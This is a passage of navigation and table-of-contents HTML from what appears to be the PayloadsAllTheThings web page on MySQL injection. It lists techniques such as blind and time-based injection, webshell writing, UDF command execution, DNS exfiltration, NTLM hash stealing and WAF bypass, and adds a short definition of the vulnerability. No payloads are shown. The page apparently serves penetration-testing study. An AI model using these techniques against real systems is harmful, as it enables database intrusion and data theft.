<span class="md-ellipsis">
MYSQL Blind Using a Conditional Statement
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-make_set" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With MAKE_SET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-like" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With LIKE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-regexp" class="md-nav__link">
<span class="md-ellipsis">
MySQL Blind with REGEXP
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-time-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Time Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Time Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#using-sleep-in-a-subselect" class="md-nav__link">
<span class="md-ellipsis">
Using SLEEP in a Subselect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-conditional-statements" class="md-nav__link">
<span class="md-ellipsis">
Using Conditional Statements
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-dios-dump-in-one-shot" class="md-nav__link">
<span class="md-ellipsis">
MYSQL DIOS - Dump in One Shot
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-current-queries" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Current Queries
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-read-content-of-a-file" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Read Content of a File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-command-execution" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Command Execution
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Command Execution">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#webshell-outfile-method" class="md-nav__link">
<span class="md-ellipsis">
WEBSHELL - OUTFILE Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#webshell-dumpfile-method" class="md-nav__link">
<span class="md-ellipsis">
WEBSHELL - DUMPFILE Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#command-udf-library" class="md-nav__link">
<span class="md-ellipsis">
COMMAND - UDF Library
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-insert" class="md-nav__link">
<span class="md-ellipsis">
MYSQL INSERT
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-truncation" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Truncation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Out of Band
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Out of Band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#dns-exfiltration" class="md-nav__link">
<span class="md-ellipsis">
DNS Exfiltration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#unc-path-ntlm-hash-stealing" class="md-nav__link">
<span class="md-ellipsis">
UNC Path - NTLM Hash Stealing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-waf-bypass" class="md-nav__link">
<span class="md-ellipsis">
MYSQL WAF Bypass
</span>
</a>
<nav class="md-nav" aria-label="MYSQL WAF Bypass">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#alternative-to-information-schema" class="md-nav__link">
<span class="md-ellipsis">
Alternative to Information Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#alternative-to-version" class="md-nav__link">
<span class="md-ellipsis">
Alternative to VERSION
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#alternative-to-group_concat" class="md-nav__link">
<span class="md-ellipsis">
Alternative to GROUP_CONCAT
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scientific-notation" class="md-nav__link">
<span class="md-ellipsis">
Scientific Notation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#conditional-comments" class="md-nav__link">
<span class="md-ellipsis">
Conditional Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wide-byte-injection-gbk" class="md-nav__link">
<span class="md-ellipsis">
Wide Byte Injection (GBK)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="../OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQLmap/" class="md-nav__link">
<span class="md-ellipsis">
SQLmap
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Request%20Forgery/SSRF-Advanced-Exploitation/" class="md-nav__link">
<span class="md-ellipsis">
SSRF Advanced Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances/" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/ASP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - ASP.NET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Java/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Java
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/JavaScript/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - JavaScript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/PHP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - PHP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Python/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Ruby
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53_2" >
<label class="md-nav__link" for="__nav_53_2" id="__nav_53_2_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_53_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53_2">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_62" >
<label class="md-nav__link" for="__nav_62" id="__nav_62_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_62_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_62">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-default-databases" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Default Databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-comments" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-testing-injection" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Testing Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-union-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Union Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Union Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#detect-columns-number" class="md-nav__link">
<span class="md-ellipsis">
Detect Columns Number
</span>
</a>
<nav class="md-nav" aria-label="Detect Columns Number">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#iterative-null-method" class="md-nav__link">
<span class="md-ellipsis">
Iterative NULL Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#order-by-method" class="md-nav__link">
<span class="md-ellipsis">
ORDER BY Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#limit-into-method" class="md-nav__link">
<span class="md-ellipsis">
LIMIT INTO Method
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#extract-database-with-information_schema" class="md-nav__link">
<span class="md-ellipsis">
Extract Database With Information_Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extract-columns-name-without-information_schema" class="md-nav__link">
<span class="md-ellipsis">
Extract Columns Name Without Information_Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extract-data-without-columns-name" class="md-nav__link">
<span class="md-ellipsis">
Extract Data Without Columns Name
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Error Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mysql-error-based-basic" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - Basic
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-updatexml-function" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - UpdateXML Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-extractvalue-function" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - Extractvalue Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-error-based-name_const-function-only-for-constants" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Error Based - NAME_CONST function (only for constants)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-blind" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Blind">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mysql-blind-with-substring-equivalent" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With Substring Equivalent
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-using-a-conditional-statement" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind Using a Conditional Statement
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-make_set" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With MAKE_SET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-like" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Blind With LIKE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-blind-with-regexp" class="md-nav__link">
<span class="md-ellipsis">
MySQL Blind with REGEXP
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-time-based" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Time Based
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Time Based">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#using-sleep-in-a-subselect" class="md-nav__link">
<span class="md-ellipsis">
Using SLEEP in a Subselect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-conditional-statements" class="md-nav__link">
<span class="md-ellipsis">
Using Conditional Statements
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-dios-dump-in-one-shot" class="md-nav__link">
<span class="md-ellipsis">
MYSQL DIOS - Dump in One Shot
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-current-queries" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Current Queries
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-read-content-of-a-file" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Read Content of a File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-command-execution" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Command Execution
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Command Execution">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#webshell-outfile-method" class="md-nav__link">
<span class="md-ellipsis">
WEBSHELL - OUTFILE Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#webshell-dumpfile-method" class="md-nav__link">
<span class="md-ellipsis">
WEBSHELL - DUMPFILE Method
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#command-udf-library" class="md-nav__link">
<span class="md-ellipsis">
COMMAND - UDF Library
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-insert" class="md-nav__link">
<span class="md-ellipsis">
MYSQL INSERT
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-truncation" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Truncation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mysql-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
MYSQL Out of Band
</span>
</a>
<nav class="md-nav" aria-label="MYSQL Out of Band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#dns-exfiltration" class="md-nav__link">
<span class="md-ellipsis">
DNS Exfiltration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#unc-path-ntlm-hash-stealing" class="md-nav__link">
<span class="md-ellipsis">
UNC Path - NTLM Hash Stealing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mysql-waf-bypass" class="md-nav__link">
<span class="md-ellipsis">
MYSQL WAF Bypass
</span>
</a>
<nav class="md-nav" aria-label="MYSQL WAF Bypass">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#alternative-to-information-schema" class="md-nav__link">
<span class="md-ellipsis">
Alternative to Information Schema
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#alternative-to-version" class="md-nav__link">
<span class="md-ellipsis">
Alternative to VERSION
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#alternative-to-group_concat" class="md-nav__link">
<span class="md-ellipsis">
Alternative to GROUP_CONCAT
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scientific-notation" class="md-nav__link">
<span class="md-ellipsis">
Scientific Notation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#conditional-comments" class="md-nav__link">
<span class="md-ellipsis">
Conditional Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wide-byte-injection-gbk" class="md-nav__link">
<span class="md-ellipsis">
Wide Byte Injection (GBK)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SQL Injection/MySQL Injection.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="mysql-injection">MySQL Injection</h1>
<blockquote>
<p>MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#mysql-default-databases">MYSQL Default Databases</a></li>
<li><a href="#mysql-comments">MYSQL Comments</a></li>
<li><a href="#mysql-testing-injection">MYSQL Testing Injection</a></li>
<li><a href="#mysql-union-based">MYSQL Union Based</a><ul>
<li><a href="#detect-columns-number">Detect Columns Number</a><ul>
<li><a href="#iterative-null-method">Iterative NULL Method</a></li>
<li><a href="#order-by-method">ORDER BY Method</a></li>
<li><a href="#limit-into-method">LIMIT INTO Method</a></li>
</ul>
</li>
<li><a href="#extract-database-with-information_schema">Extract Database With Information_schema</a></li>
<li><a href="#extract-columns-name-without-information_schema">Extract Columns Name Without Information_Schema</a></li>
<li><a href="#extract-data-without-columns-name">Extract Data Without Columns Name</a></li>
</ul>
</li>
<li><a href="#mysql-error-based">MYSQL Error Based</a><ul>
<li><a href="#mysql-error-based---basic">MYSQL Error Based - Basic</a></li>
